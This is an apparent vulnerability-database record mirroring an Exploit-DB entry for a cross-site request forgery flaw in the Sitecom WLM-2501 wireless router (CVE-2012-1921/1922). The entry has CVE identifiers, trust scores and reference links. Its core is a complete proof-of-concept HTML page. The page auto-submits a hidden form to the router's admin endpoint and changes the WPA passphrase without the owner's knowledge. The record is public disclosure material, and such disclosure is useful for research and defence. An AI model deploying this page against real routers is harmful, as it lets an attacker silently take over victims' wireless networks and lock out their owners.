ID
VAR-E-201203-0134
CVE
| cve_id: | CVE-2012-1921 | Trust: 1.6 |
| cve_id: | CVE-2012-1922 | Trust: 1.0 |
EDB ID
18597
TITLE
Sitecom WLM-2501 - Cross-Site Request Forgery - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Sitecom WLM-2501 - Cross-Site Request Forgery. CVE-2012-1922CVE-2012-1921CVE-80538 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | sitecom | model: | wlm-2501 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
+--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : Sitecom WLM-2501 Change Wireless Passphrase
# Date : 13-03-2012
# Author : Ivano Binetti (http://www.ivanobinetti.com)
# Vendor site : http://www.sitecom.com/wireless-modem-router-300n/p/859
# Version : WLM-2501
# Tested on : WLM-2501 (All Sitecom WL series might be is affected by these vulnerabilities)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
2)Vulnerability Description
3)Exploit
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Sitecom WLM-2501 is a Wireless Modem Router 300N which uses a web management interface - listening to default on tcp/ip port 80
- and "admin" as default administrator. His default ip address is 192.168.0.1.
2)Vulnerability Description
The web interface of this router is affected by muktiple CSRF vulnerabilities which allows to change router parameters and
- among other things - to change Wireless Passphrase.
3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formWlEncrypt">
<input type="hidden" name="wlanDisabled" value="OFF"/>
<input type="hidden" name="method" value="6"/>
<input type="hidden" name="wpaAuth" value="psk"/>
<input type="hidden" name="pskFormat" value="0"/>
<input type="hidden" name="pskValue" value="newpassword"/>
<input type="hidden" name="submit-url" value="%2Fwlwpa.asp"/>
<input type="hidden" name="save" value="Apply"/>
</form>
</body>
</html>
+--------------------------------------------------------------------------------------------------------------------------------+
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Request Forgery
Trust: 1.0
CREDITS
Ivano Binetti
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2012-1921 | Trust: 1.6 |
| db: | EXPLOIT-DB | id: | 18597 | Trust: 1.6 |
| db: | NVD | id: | CVE-2012-1922 | Trust: 1.0 |
| db: | EDBNET | id: | 40941 | Trust: 0.6 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-1921 | Trust: 1.6 |
| url: | http://ivanobinetti.blogspot.com/2012/03/sitecom-wlm-2501-change-wireless.html | Trust: 1.0 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-1922 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/18597/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 18597 |
| db: | EDBNET | id: | 40941 |
LAST UPDATE DATE
2022-07-27T09:35:43.404000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 18597 | date: | 2012-03-14T00:00:00 |
| db: | EDBNET | id: | 40941 | date: | 2012-03-14T00:00:00 |